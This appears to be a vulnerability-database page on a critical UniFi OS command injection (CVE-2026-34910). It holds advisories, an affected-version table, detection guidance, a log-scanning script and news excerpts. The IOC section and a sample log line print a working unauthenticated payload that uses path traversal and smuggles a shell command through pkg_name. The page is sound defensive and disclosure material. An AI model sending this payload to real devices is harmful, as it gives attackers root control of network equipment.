CVE-2026-34910
Published: 2026-05-22
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
Priority: P1 · 100 · critical
CVSS 3.1: 10 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Tags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, due 2026-06-26
Exploited in the wild
EPSS: 78.55% (99.5th percentile)
Affected
62 ranges · showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ubiquiti_inc | efg | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | envr | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | envr-core | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | express_7 | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-fiber | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-industrial | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-max | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-ultra | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | uck | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | uck-enterprise | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | uckp | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm-beast | < 5.1.11 | 5.1.11 |
| ubiquiti_inc | udm-pro | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm-pro-max | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm-se | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udr | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udr-5g | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udr7 | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udw | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | unas-2 | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-4 | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-pro | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-pro-4 | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-pro-8 | < 5.1.10 | 5.1.10 |
Detection & IOCs (extracted from sources)
url: GET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+{{interactsh-url}}+%3b HTTP/1.1
yara: matchers: dsl: contains_any(body, "CODE_SYSTEM_ERROR", "System failure") AND contains(interactsh_protocol, "dns") AND status_code == 200
- Look for path traversal sequences in requests targeting /api/auth/validate-sso/ — the authentication component evaluates the raw request URI while Nginx routes based on a normalized URI, enabling auth bypass to reach protected internal routes.
- Monitor requests to the package-update endpoint 'ucs/update/latest_package' for unsanitized user input in the pkg_name parameter, which is passed directly into a shell command.
- Because the attack requires no authentication, there will be no failed-login trail. Focus detection on process and network telemetry rather than auth logs.
- CVE-2026-34910 is chained with CVE-2026-34908 (auth bypass) and CVE-2026-34909 (path traversal) in a single-request RCE exploit delivering a root reverse shell; detections should consider the full chain.
- The detection script does NOT detect active attacks, past exploitation, or the presence of persistence mechanisms/backdoors — only current vulnerability status.
- Organizations applying the patch should first confirm the system has not already been compromised before trusting the patched state.
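The first two checks above can be run over web access logs. The following is an added example, not code from any of the cited sources: it compares the raw request path with its decoded, normalized form and inspects pkg_name on the update route. The log format, the sample lines and the pkg_name allowlist are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

AUTH_PREFIX = "/api/auth/validate-sso/"      # route named on the page
UPDATE_ROUTE = "ucs/update/latest_package"   # route named on the page
SAFE_PKG = re.compile(r"[A-Za-z0-9._-]+")    # assumption: conservative allowlist
REQUEST = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IPs, placeholder hostname).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jun/2026:09:00:01 +0000] "GET /api/auth/validate-sso/session-check HTTP/1.1" 200 54',
    '198.51.100.7 - - [10/Jun/2026:09:00:02 +0000] "GET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+canary.example.invalid+%3b HTTP/1.1" 200 88',
    '198.51.100.7 - - [10/Jun/2026:09:00:03 +0000] "GET /api/auth/validate-sso/..%252f..%252fproxy/users HTTP/1.1" 404 0',
]

def normalized_path(raw_path, max_rounds=3):
    """Percent-decode repeatedly (catches double encoding), then collapse '..'."""
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return posixpath.normpath(path)

def findings_for_uri(raw_uri):
    """Compare the raw path (what the auth check sees) with the normalized one."""
    parts = urlsplit(raw_uri)
    norm = normalized_path(parts.path)
    found = []
    if parts.path.startswith(AUTH_PREFIX) and not (norm + "/").startswith(AUTH_PREFIX):
        found.append("auth-prefix-escape")
    if UPDATE_ROUTE in norm:
        values = parse_qs(parts.query, keep_blank_values=True).get("pkg_name", [])
        if any(not SAFE_PKG.fullmatch(v) for v in values):
            found.append("pkg_name-unsafe")
    return found

def scan(lines):
    hits = {}
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        found = findings_for_uri(match.group("uri")) if match else []
        if found:
            hits[number] = found
    return hits
```

A hit only shows that a matching request was received; as the notes above say, confirming or ruling out compromise still needs process and network telemetry.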
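CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 10.0 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| vulncheck | | 10.0 | CRITICAL | |
| cisa | | 10.0 | CRITICAL | |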
VulDB
Ubiquiti UniFi OS Server up to 5.0.7 input validation (WID-SEC-2026-1639)
vuldb·2026-06-23·CVSS 10.0
CVE-2026-34910 [CRITICAL] Ubiquiti UniFi OS Server up to 5.0.7 input validation (WID-SEC-2026-1639)
A vulnerability labeled as very critical has been found in Ubiquiti UniFi OS Server, UDM, UDM-Pro, UDM-SE, UDM-Pro-Max, UDM-Beast, EFG, UDW, UDR, UDR7, UDR-5G, Express 7, UNVR, UNVR-Pro, UNVR-Instant, UNVR-G2, UNVR-G2-Pro, ENVR, ENVR-Core, UNAS-2, UNAS-4, UNAS-Pro, UNAS-Pro-4, UNAS-Pro-8, UCKP, UCK, UCK-Enterprise, UCG-Ultra, UCG-Max, UCG-Fiber and UCG-Industrial up to 5.0.7. This issue affects some unknown processing. Executing a manipulation can lead to improper input validation.
This vulnerability is handled as CVE-2026-34910. The attack can be executed remotely. Additionally, an exploit exists.
The affected component should be upgraded.
GHSA
GHSA-fvgm-jgwh-qwx7: A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command I
ghsa_unreviewed·2026-05-22
CVE-2026-34910 [CRITICAL] CWE-20 GHSA-fvgm-jgwh-qwx7: A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command I
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
VulnCheck
Improper Input Validation
vulncheck·2026·CVSS 10.0
CVE-2026-34910 [CRITICAL] Improper Input Validation
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.pwndefend.com/2026/06/09/cve-2026-34910-exploitation-itw-building-a-botnet-mirai/
VulnCheck
Improper Access Control
vulncheck·2026·CVSS 10.0
CVE-2026-34908 [CRITICAL] Improper Access Control
A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system.
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.pwndefend.com/2026/06/09/cve-2026-34910-exploitation-itw-building-a-botnet-mirai/
CISA
Ubiquiti UniFi OS Improper Input Validation Vulnerability
cisa·2026-06-23·CVSS 10.0
CVE-2026-34910 [CRITICAL] CWE-20 Ubiquiti UniFi OS Improper Input Validation Vulnerability
Vulnerability: Ubiquiti UniFi OS Improper Input Validation Vulnerability
Affected: Ubiquiti UniFi OS
Ubiquiti UniFi OS contains an improper input validation vulnerability which could allow a malicious actor with access to the network to conduct command injection.
Required Action: Apply mitigations in accordance with vendor instructions, ensuring compliance with CISA’s BOD 26-04 Prioritizing Security Updates Based on Risk (see URL in Notes) guidance and CISA’s “Forensics Triage Requirements” (see URL in Notes). Follow applicable BOD 26-04 guidance for cloud services or discontinue use of the product if mitigations are unavailable. Stakeholders are responsible for evaluating each asset's internet exposure and ensuring adherence to BOD 26-04 patching guidelines.
Notes: https://community.ui
No detection rules found.
Nuclei
UniFi OS Server - Command Injection
nuclei·CVSS 10.0
CVE-2026-34910 [CRITICAL] UniFi OS Server - Command Injection
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
Template:
id: CVE-2026-34910
info:
  name: UniFi OS Server - Command Injection
  author: Kazgangap
  severity: critical
  description: |
    A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
  impact: |
    Network attackers can execute arbitrary commands, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of UniFi OS.
  reference:
    - https://bishopfox.com/blog/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysis
    - https://nvd.nist.gov/vuln/de
Checkpoint
29th June – Threat Intelligence Report
blogs_checkpoint·2026-06-29
CVE-2026-20245 29th June – Threat Intelligence Report
## 29th June – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 29th June, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Polymarket, a large cryptocurrency-based prediction market, has confirmed a supply chain attack after a third-party frontend vendor breach led to malicious JavaScript being injected into its website. Attackers tricked users into approving fraudulent transactions, stealing about $3 million from fewer than 15 accounts, while the b
Hackernews
CISA Warns Critical Lantronix EDS5000 Flaw Is Being Actively Exploited
blogs_hackernews·2026-06-24·CVSS 9.8
CVE-2025-67038 [CRITICAL] CISA Warns Critical Lantronix EDS5000 Flaw Is Being Actively Exploited
## CISA Warns Critical Lantronix EDS5000 Flaw Is Being Actively Exploited
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday warned of active exploitation of a critical security flaw impacting Lantronix EDS5000 Series devices, urging Federal Civilian Executive Branch (FCEB) agencies to apply the fixes by June 26, 2026.
The vulnerability in question is CVE-2025-67038 (CVSS score: 9.8), a code injection flaw that could result in the execution of arbitrary commands with elevated privileges.
"The HTTP RPC module executes a shell command to write logs when the user's authentication fails," according to the
Bleepingcomputer
CISA warns of max severity Ubiquiti flaws exploited in attacks
blogs_bleepingcomputer·2026-06-24·CVSS 9.8
CVE-2026-34908 [CRITICAL] CISA warns of max severity Ubiquiti flaws exploited in attacks
## CISA warns of max severity Ubiquiti flaws exploited in attacks
## Bill Toulas
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of hackers actively exploiting flaws in Ubiquiti UniFi OS and Lantronix serial-to-ethernet servers.
According to the BOD 26-04 directive, federal agencies have three days to apply available security updates or vendor-recommended mitigations.
The Ubiquiti flaws that CISA added to its catalog of Known Exploited Vulnerabilities are:
CVE-2026-34908: an access control bypass flaw that allows an unauthenticated attacker to make unauthorized changes to a UniFi OS system, potentially leading to full system compromise.
CVE-2026-34909: a directory/path traversal vulnerability that allows an attacker to access sensitive files on the unde
Hackernews
⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More
blogs_hackernews·2026-06-15·CVSS 8.8
CVE-2026-11645 [HIGH] ⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More
## ⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More
Stuff broke again. Not in a movie way. An old tool was left exposed. An abandoned package was abused. A deprecated feature was still running in prod.
This week is the same lesson in a new form: phishing kits are easier to rent, AI names are useful bait, old login paths still fail, and forgotten software keeps becoming someone else's entry point.
Scroll through the full Monday Cybersecurity Recap below for the news, tools, webinars, and fixes worth your time this week.
## ⚡ Threat of the Week
Google Patches Actively Exploited Chrome 0-Day - G
Bleepingcomputer
Critical UniFi OS bug lets hackers gain root without authentication
blogs_bleepingcomputer·2026-06-08·CVSS 10.0
CVE-2026-34908 [CRITICAL] Critical UniFi OS bug lets hackers gain root without authentication
## Critical UniFi OS bug lets hackers gain root without authentication
## Bill Toulas
Attackers can chain three already fixed vulnerabilities in the Ubiquiti UniFi OS server to execute remote code with root privileges and without authentication.
The security issues are tracked as CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910. They have been addressed in May and impact UniFi OS Server versions 5.0.6 and earlier.
While all three flaws received the maximum severity rating despite their exploitation requiring access to the network, the vendor's advisory did not mention that they could be chained for remote code execution.
CVE-2026-34908 is an improper access control flaw that can allow unauthorized changes to vulnerable systems
CVE-2026-34909 is a path traversal vulnerability that c
Hackernews
⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos
blogs_hackernews·2026-05-25
CVE-2026-46333 ⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos
## ⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos
Monday recap. Same mess, new week.
A sketchy dev tool got people pwned, old bugs came back from the dead, and security products somehow needed protecting from themselves. A bunch of companies spent the week checking old boxes and forgotten servers they should've patched years ago. Good times.
Phishing crews are getting smarter too - less obvious scam junk, more targeted stuff that actually looks real. Meanwhile, botnets are grabbing anything exposed to the internet like it's free candy. The Internet's still a dumpster fire.
Let’s get into
Bleepingcomputer
Ubiquiti patches three max severity UniFi OS vulnerabilities
blogs_bleepingcomputer·2026-05-22·CVSS 10.0
CVE-2026-34908 [CRITICAL] Ubiquiti patches three max severity UniFi OS vulnerabilities
## Ubiquiti patches three max severity UniFi OS vulnerabilities
## Sergiu Gatlan
Ubiquiti has released security updates to patch three maximum severity vulnerabilities in UniFi OS that can be exploited by remote attackers without privileges.
UniFi OS is a unified operating system that powers UniFi Consoles and helps manage IT infrastructure, including networking, security, and other services, as well as UniFi applications such as UniFi Network, UniFi Protect, UniFi Access, UniFi Talk, and UniFi Connect.
The first flaw (CVE-2026-34908) enables attackers to make unauthorized changes to targeted systems by exploiting an Improper Access Control weakness in UniFi OS, while the second (CVE-2026-34909) allows them to access files on the underlying system by abusing a Path Traversal vulner
Published: 2026-05-22
Added to CISA KEV: 2026-06-23
Exploited in the wild